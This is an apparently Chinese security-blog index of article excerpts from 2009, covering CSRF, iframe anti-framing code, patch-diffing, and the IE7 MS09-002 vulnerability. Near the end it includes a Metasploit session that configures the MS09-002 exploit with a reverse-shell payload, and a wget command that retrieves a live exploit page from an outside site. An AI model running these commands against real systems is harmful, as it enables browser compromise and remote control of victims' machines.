作者:云舒
摘要:这个文章是周五开始酝酿的,前半部分是总结,最后一小段只是为了说明一下安全的相通性,将csrf类比到tcp协议,从协议的角度阐述一下 csrf产生的本质原因。想不到写到一小半就腰酸背疼,大部分内容都只能草草带过,很多地方需要进一步解释,都没法深入的描述下去了。一直说要坚持健身, 却从来没去过,是在是罪过,先凑合着看看吧,有问题还请指出一下。
阅读全文 »
Tags: CSRF,
WAP
作者:Xeye Hack Team
你相信你的鼠标吗?
有没有想过,当你的鼠标在选取一段话,通过翻译软件的平面取词功能进行翻译,然后就被躲在角落的某个家伙给hack了。
–xeye hack team。
假如我们要完成以上的攻击,需要满足的条件:
1.找到翻译软件的漏洞,而且是remote的。
2.假设1成立,那么remote可以借助浏览器来搭桥,所以浏览器必须可以被翻译软件取词等等。
阅读全文 »
Tags: hijack,
翻译软件
作者:Monyer
网上通用的防插那版是(子):
if(top.location != self.location){
top.location = self.location;
}
强插方案为(父):
阅读全文 »
Tags: iframe
作者:FireFox[F.s.T]
文章投稿于09年2月黑客手册http://www.nohack.cn/
经编辑同意放出 目的是为与大家有更好的交流 更多精彩内容请参阅 黑客手册
背景:
所谓补丁或者更新,一直以来是研发方为更新产品安全问题、增加新功能或提高运行效率而发布的。但对于安全研究人员来讲,补丁或者更新一直以来也被认为是漏洞挖掘的“指南针”,就类似微软发布更新的星期二,就被很多安全研究人员喻为“Black tuesday”,为什么这样讲呢?因为很多安全研究人员可以根据补丁逆向分析出问题所在,从而再次触发漏洞,迅速编写漏洞溢出代码,通常情况下这种漏洞代码不被认为是0day,但是在大的范围内造成的影响丝毫不比0day差。
阅读全文 »
Tags: 技巧,
漏洞挖掘
来源:Carnal0wnage Blog
Details to follow. :-)
msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701
阅读全文 »
Tags: Exploit,
MS09-002
作者:Friddy
Microsoft IE CFunctionPointer函数内存破坏漏洞(MS09-002)
发布时间:2009-02-10
影响版本:
Microsoft Internet Explorer 7.0
漏洞描述:
BUGTRAQ ID: 33627
CVE(CAN) ID: CVE-2009-0075
阅读全文 »
Tags: Exploit,
MS09-002
<!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"
took a little but found it. /str0ke
-->
阅读全文 »
Tags: IE7,
MS09-002,
PoC